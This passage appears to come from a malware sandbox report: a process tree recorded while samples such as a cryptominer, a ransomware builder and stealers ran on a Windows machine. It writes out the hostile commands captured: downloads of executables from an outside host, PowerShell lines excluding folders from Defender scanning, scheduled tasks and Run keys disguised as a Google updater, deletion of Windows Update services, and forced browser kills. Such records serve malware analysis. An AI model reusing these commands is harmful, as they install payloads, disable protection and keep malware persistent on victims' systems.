        PID:4396
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 1
        6⤵
        Runs ping.exe
        
        PID:2024
      - C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exe
        
        wmild.exe -c http://duserifram.toshibanetcam.com/app.exe
        6⤵
        
        PID:3404
      - C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exe
        
        wmild.exe -c http://duserifram.toshibanetcam.com/tibokUS.exe
        6⤵
        
        PID:2460
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "hkcu\software\microsoft\windows\currentversion" /v "alg" /t reg_sz /d svr.vbs /f
        6⤵
        
        PID:2024
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 6
        6⤵
        Runs ping.exe
        
        PID:6056
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY hkcu\software\microsoft\windows\currentversion
        6⤵
        Modifies registry key
        
        PID:5520
      - C:\Windows\SysWOW64\find.exe
        
        find "svr.vbs"
        6⤵
        
        PID:5144
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 3
      4⤵
      Runs ping.exe
      PID:5532
  - - C:\Windows\SysWOW64\explorer.exe
      explorer.exe C:\Users\Admin\AppData\Roaming\Macromedia
      4⤵
      PID:5684
- C:\Users\Admin\AppData\Local\Temp\Files\Doublepulsar-1.3.1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Doublepulsar-1.3.1.exe"
  2⤵
  PID:3804
- C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"
  2⤵
  PID:3124
- - C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"
    3⤵
    PID:1556
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      PID:5052
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:4016
- C:\Users\Admin\AppData\Local\Temp\Files\Aztec.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Aztec.exe"
  2⤵
  PID:1852
- C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe"
  2⤵
  PID:6044
- C:\Users\Admin\AppData\Local\Temp\Files\patch.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\patch.exe"
  2⤵
  PID:636
- C:\Users\Admin\AppData\Local\Temp\Files\ransom_builder.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ransom_builder.exe"
  2⤵
  PID:3960
- C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe"
  2⤵
  PID:3108
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3108 -s 1068
    3⤵
    - Program crash
    PID:2604
- C:\Users\Admin\AppData\Local\Temp\Files\build.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\build.exe"
  2⤵
  PID:1184
- C:\Users\Admin\AppData\Local\Temp\Files\ofg7d45fsdfgg312.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ofg7d45fsdfgg312.exe"
  2⤵
  PID:1248
- - C:\Windows\SysWOW64\SCHTASKS.exe
    SCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Temp\Files\ofg7d45fsdfgg312.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:6048
- C:\Users\Admin\AppData\Local\Temp\Files\iox.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\iox.exe"
  2⤵
  PID:5228
- C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
  2⤵
  PID:1184
- C:\Users\Admin\AppData\Local\Temp\Files\12028.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\12028.exe"
  2⤵
  PID:1040
- C:\Users\Admin\AppData\Local\Temp\Files\6.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\6.exe"
  2⤵
  PID:4628
- C:\Users\Admin\AppData\Local\Temp\Files\gate3_64.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\gate3_64.exe"
  2⤵
  PID:5940
- C:\Users\Admin\AppData\Local\Temp\Files\123.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\123.exe"
  2⤵
  PID:2108
- C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"
  2⤵
  PID:4068
- - C:\Windows\syspolrvcs.exe
    C:\Windows\syspolrvcs.exe
    3⤵
    PID:6108
- C:\Users\Admin\AppData\Local\Temp\Files\1230.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\1230.exe"
  2⤵
  PID:3092
- C:\Users\Admin\AppData\Local\Temp\Files\288c47bbc1871b439df19ff4df68f0766.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\288c47bbc1871b439df19ff4df68f0766.exe"
  2⤵
  PID:3420
- C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe"
  2⤵
  PID:5212
- C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Cpp_1_4.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Cpp_1_4.exe"
  2⤵
  PID:2388

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x420 0x2f4
1⤵
PID:500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 904 -ip 904
1⤵
PID:3800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1664 -ip 1664
1⤵
PID:4604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /f /im opera.exe"
1⤵
PID:2692
- C:\Windows\system32\taskkill.exe
  taskkill /f /im opera.exe
  2⤵
  - Kills process with taskkill
  PID:4324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /f /im brave.exe"
1⤵
PID:1732
- C:\Windows\system32\taskkill.exe
  taskkill /f /im brave.exe
  2⤵
  - Kills process with taskkill
  PID:3816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /f /im msedge.exe"
1⤵
PID:1156
- C:\Windows\system32\taskkill.exe
  taskkill /f /im msedge.exe
  2⤵
  - Kills process with taskkill
  PID:3892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /f /im opera.exe"
1⤵
PID:3096
- C:\Windows\system32\taskkill.exe
  taskkill /f /im opera.exe
  2⤵
  - Kills process with taskkill
  PID:2912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /f /im chrome.exe"
1⤵
PID:3856
- C:\Windows\system32\taskkill.exe
  taskkill /f /im chrome.exe
  2⤵
  - Kills process with taskkill
  PID:3928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2732 -ip 2732
1⤵
PID:4744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3368 -ip 3368
1⤵
PID:3096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4548 -ip 4548
1⤵
PID:3892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3096 -ip 3096
1⤵
PID:4608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4588 -ip 4588
1⤵
PID:5012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3096 -ip 3096
1⤵
PID:4108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3096 -ip 3096
1⤵
PID:3892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3096 -ip 3096
1⤵
PID:2772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3096 -ip 3096
1⤵
PID:1504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3096 -ip 3096
1⤵
PID:4072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 3096 -ip 3096
1⤵
PID:4672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3096 -ip 3096
1⤵
PID:1476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:1344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:5140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xfxixcb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
1⤵
PID:5344

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:5332
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:5508
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:5556
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:5568
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:5592

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:5324
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:5520
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:5548
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:5600
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:5628
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:5656
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
  2⤵
  PID:5676
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
  2⤵
  PID:5692
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
  2⤵
  PID:5708
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
  2⤵
  PID:5816
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:5828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3096 -ip 3096
1⤵
PID:5424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3096 -ip 3096
1⤵
PID:5664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3096 -ip 3096
1⤵
PID:5956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3096 -ip 3096
1⤵
PID:6104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3096 -ip 3096
1⤵
PID:4736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3096 -ip 3096
1⤵
PID:3964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3096 -ip 3096
1⤵
PID:2312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3096 -ip 3096
1⤵
PID:1092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3096 -ip 3096
1⤵
PID:4616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#extmbyk#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
1⤵
- Suspicious use of WriteProcessMemory
PID:1804
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
  2⤵
  PID:5496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3096 -ip 3096
1⤵
PID:5108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3096 -ip 3096
1⤵
PID:5428

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:5488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 5320 -ip 5320
1⤵
PID:5476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5320 -ip 5320
1⤵
PID:5556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5320 -ip 5320
1⤵
PID:5260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5320 -ip 5320
1⤵
PID:5188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5320 -ip 5320
1⤵
PID:2388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5320 -ip 5320
1⤵
PID:5596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 5320 -ip 5320
1⤵
PID:2744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5320 -ip 5320
1⤵
PID:5784

C:\ProgramData\hlkwogclqprr\uwgxswmtctao.exe
C:\ProgramData\hlkwogclqprr\uwgxswmtctao.exe
1⤵
PID:756
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:1396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5320 -ip 5320
1⤵
PID:2548

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:5392

C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
1⤵
PID:4632
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:5096
- - C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
    "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe"
    3⤵
    PID:5664
  - - C:\Windows\system32\conhost.exe
      conhost.exe
      4⤵
      PID:5412
- - C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
    "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe"
    3⤵
    PID:5452
- - C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
    "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe"
    3⤵
    PID:5160
- - C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
    "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe"
    3⤵
    PID:4548
  - - C:\Windows\system32\conhost.exe
      conhost.exe
      4⤵
      PID:5288
- - C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
    "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe"
    3⤵
    PID:1900
- - C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
    "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe"
    3⤵
    PID:2816
  - - C:\Windows\system32\conhost.exe
      conhost.exe
      4⤵
      PID:628
- - C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
    "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe"
    3⤵
    PID:924
  - - C:\Windows\system32\conhost.exe
      conhost.exe
      4⤵
      PID:4164
- C:\Windows\system32\conhost.exe
  conhost.exe
  2⤵
  PID:5692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xfxixcb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
1⤵
PID:3016

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:2296
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:5832
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:4040
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:5076
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:5800

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:5860
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:1212
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:5580
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:6048
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:5336
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:5232
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
  2⤵
  PID:5200
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
  2⤵
  PID:2312
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
  2⤵
  PID:2188
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
  2⤵
  PID:5828
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:5568

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
PID:4560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 3940 -ip 3940
1⤵
PID:888

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:1508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:4396

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe pxpxvzslvmqtfph
1⤵
PID:2700

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
1⤵
PID:5676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3108 -ip 3108
1⤵
PID:2776

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
1⤵
PID:4380

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xfxixcb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
1⤵
PID:5832

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:4364

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#extmbyk#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
1⤵
PID:3920

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:5392

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1800

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
1⤵
PID:1260
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1260 -s 416
  2⤵
  - Program crash
  PID:5420

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
PID:4652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5320 -ip 5320
1⤵
PID:1960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5320 -ip 5320
1⤵
PID:2876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5320 -ip 5320
1⤵
PID:556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:4404

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gbwcex#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
1⤵
PID:656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1260 -ip 1260
1⤵
PID:5592

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vfmevgxzp#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
1⤵
PID:5764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4868 -ip 4868
1⤵
PID:3420

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:5588

C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
1⤵
PID:4040
